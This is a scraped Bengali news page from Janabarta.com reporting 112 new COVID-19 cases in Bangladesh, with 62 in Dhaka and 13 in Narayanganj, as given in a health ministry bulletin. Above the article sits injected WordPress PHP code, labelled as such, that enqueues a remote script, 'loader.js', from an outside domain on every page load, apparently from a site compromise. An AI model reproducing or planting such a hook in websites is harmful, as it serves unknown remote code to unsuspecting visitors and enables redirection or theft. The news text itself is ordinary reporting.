// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site ঢাকায় নতুন আক্রান্ত ৬২, নারায়ণগঞ্জে ১৩ - Janabarta.com

ঢাকায় নতুন আক্রান্ত ৬২, নারায়ণগঞ্জে ১৩

জনবার্তা অনলাইনঃ গত ২৪ ঘণ্টায় দেশে করোনাভাইরাসে যারা আক্রান্ত হয়েছেন তাদের মধ্যে ৬২ জনই ঢাকার বাসিন্দা। এ ছাড়া ১৩ জন নারায়ণগঞ্জের বাসিন্দা। বাকিরা দেশের অন্যান্য স্থানের। একদিনের ব্যবধানে দেশে ১১২ জন কোভিড-১৯-এ আক্রান্ত হয়েছেন।

আজ বৃহস্পতিবার বেলা আড়াইটায় স্বাস্থ্য অধিদপ্তরের করোনা সংক্রান্ত বিশেষ বুলেটিনে এসব তথ্য জানানো হয়। প্রথমে এতে অনলাইনে যুক্ত হয়ে স্বাস্থ্যমন্ত্রী জাহিদ মালেক জানান, গত ২৪ ঘণ্টায় দেশে ১ হাজার ৯৭ জনের নমুনা পরীক্ষা করা হয়। এর মধ্যে ১১২ জনকে করোনা আক্রান্ত হিসেবে শনাক্ত করা হয়। এ ছাড়া গত ২৪ ঘণ্টায় এক জনের মৃত্যু হয়েছে।

এর পর জাতীয় রোগতত্ত্ব রোগ নিয়ন্ত্রণ ও গবেষণা প্রতিষ্ঠানের (আইইডিসিআর) পরিচালক মীরাজাদী সেব্রিনা ফ্লোরা জানান, নতুন আক্রান্তদের ৬২ জন ঢাকার এবং ১৩ জন নারায়ণগঞ্জের বাসিন্দা।

তিনি আরো জানান, নতুন আক্রান্তদের মধ্যে ৭০ জন পুরুষ এবং বাকিরা নারী। 

গত ৮ মার্চ দেশে প্রথম করোনা রোগী শনাক্ত হয়। তারপর থেকে এ পর্যন্ত মোট আক্রান্ত হলেন ৩৩০ জন। আজকের এক জন নিয়ে মোট মৃত্যু হলো ২১ জনের। এ ছাড়া চিকিৎসা শেষে সুস্থ হয়েছেন ৩৩ জন।